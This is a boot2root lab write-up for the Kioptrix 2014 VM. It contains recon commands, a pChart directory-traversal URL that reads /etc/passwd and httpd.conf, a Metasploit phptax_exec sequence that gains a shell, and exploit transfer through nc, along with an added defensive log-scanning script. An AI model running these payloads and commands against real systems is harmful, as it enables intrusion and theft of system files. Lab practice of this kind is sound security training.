KIOPTRIX: 2014 (#5) writeup - PacketMonkey22/boot2roots GitHub Wiki

nmap - find $ip

nmap -A -T4 -p- $ip

22, 80, and 8080

check $ip in browser - "It works!"

check source - pChart2.1.3/index.php (opens)

check $ip with port 8080 - Forbidden

check $ip with port 8080 - Restricted

dirb $ip - /cgi-bin (Forbidden), index.html (it works)

nikto $ip -- CVE-2002-0082; allowed methods: GET, HEAD, POST, OPTIONS, TRACE

Apache 2.2.21, PHP 5.3.8, OpenSSL 0.9.8zc, mod_ssl 2.2.21

back to pChart.

searchsploit pchart -- vulnerabilities

nano 31173 -- directory traversal

$IP/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd -- success

It's using Apache, so try the same traversal to httpd.conf -- success
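The two traversal requests above are exactly the kind of thing a defender should be able to pull out of the Apache access log. This is an added example (not part of the original writeup): a small Python scanner that percent-decodes each request target (repeatedly, so double encoding such as %252e%252e is caught too), flags any ".." path segment, and marks hits that name a sensitive file and returned 200. The log lines, IPs, timestamps and the apache22 config path are constructed for the example.

```python
# Added example, not from the original writeup: flag directory-traversal
# attempts (like the pChart Script=%2f..%2f.. request) in Apache access logs.
# All log lines below are constructed sample data.
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /pChart2.1.3/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1854 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e/%252e%252e/usr/local/etc/apache22/httpd.conf HTTP/1.1" 200 20901 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/4.0"
10.0.0.9 - - [01/Jan/2024:10:01:03 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=../pChart/pData.class.php HTTP/1.1" 200 40 "-" "Mozilla/4.0"
"""

# Minimal combined-format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A ".." segment at the start of the target, after a slash/backslash,
# or directly after a query "=" or "&".
TRAVERSAL_SEG = re.compile(r'(?:^|[\\/=&])\.\.(?:[\\/]|$)')

# Files whose disclosure is worth escalating immediately (extend per environment).
SENSITIVE = ('/etc/passwd', '/etc/shadow', 'httpd.conf', '.htpasswd')


def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded '../' (%252e%252e) is caught too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_line(line):
    """Return a hit dict for a traversal-looking request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m['target'])
    if not TRAVERSAL_SEG.search(decoded):
        return None
    return {
        'ip': m['ip'],
        'ts': m['ts'],
        'status': int(m['status']),
        'decoded': decoded,
        'sensitive': any(name in decoded for name in SENSITIVE),
        # A 200 on a traversal request is the one to escalate: the read likely worked.
        'likely_success': m['status'] == '200',
    }


def scan(log_text):
    """Run analyze_line over every line and keep the hits, in log order."""
    return [h for h in (analyze_line(l) for l in log_text.splitlines()) if h]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        flag = 'SENSITIVE' if hit['sensitive'] else 'traversal'
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {flag}: {hit['decoded']}")
```

Three of the five constructed lines are flagged; the /etc/passwd and httpd.conf reads are marked sensitive, and the in-tree ../pChart/ include is reported as a plain traversal so it can be reviewed rather than ignored. Apache logs the raw, still-encoded request line, which is why the decode step runs before matching.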

near the bottom, the data2 directory has "allow from" Mozilla4 (User-Agent based) and a VirtualHost on 8080

curl -H "User-Agent:Mozilla/4.0" http://$ip:8080 -- mentions phptax directory

what is phptax? -- google: possibly a Linux tax program. Interestingly, when googling the name, a few results down was exploit-db.com

https://www.exploit-db.com/exploits/21665

searchsploit phptax -- 3 results: 1 .rb and 2 .txt. Read the texts, looked at the .rb; it requires msf

msfconsole

search name:phptax type:exploit -- exploit/multi/http/phptax_exec

use exploit/multi/http/phptax_exec

set rhost $ip

set rport 8080

run

whoami - www

no other users, and pretty much everything is root

system is FreeBSD 9

can I compile? - yes, gcc exists

does nc exist? - yes

on kali:

found BSD exploit 28718 and downloaded it -- https://www.exploit-db.com/exploits/28718

cp 28718.c /var/www/html/

python -m SimpleHTTPServer 80

on target:

as www, in the login folder

nc -nv $ip 80 > 28718

wouldn't compile on target. --pending--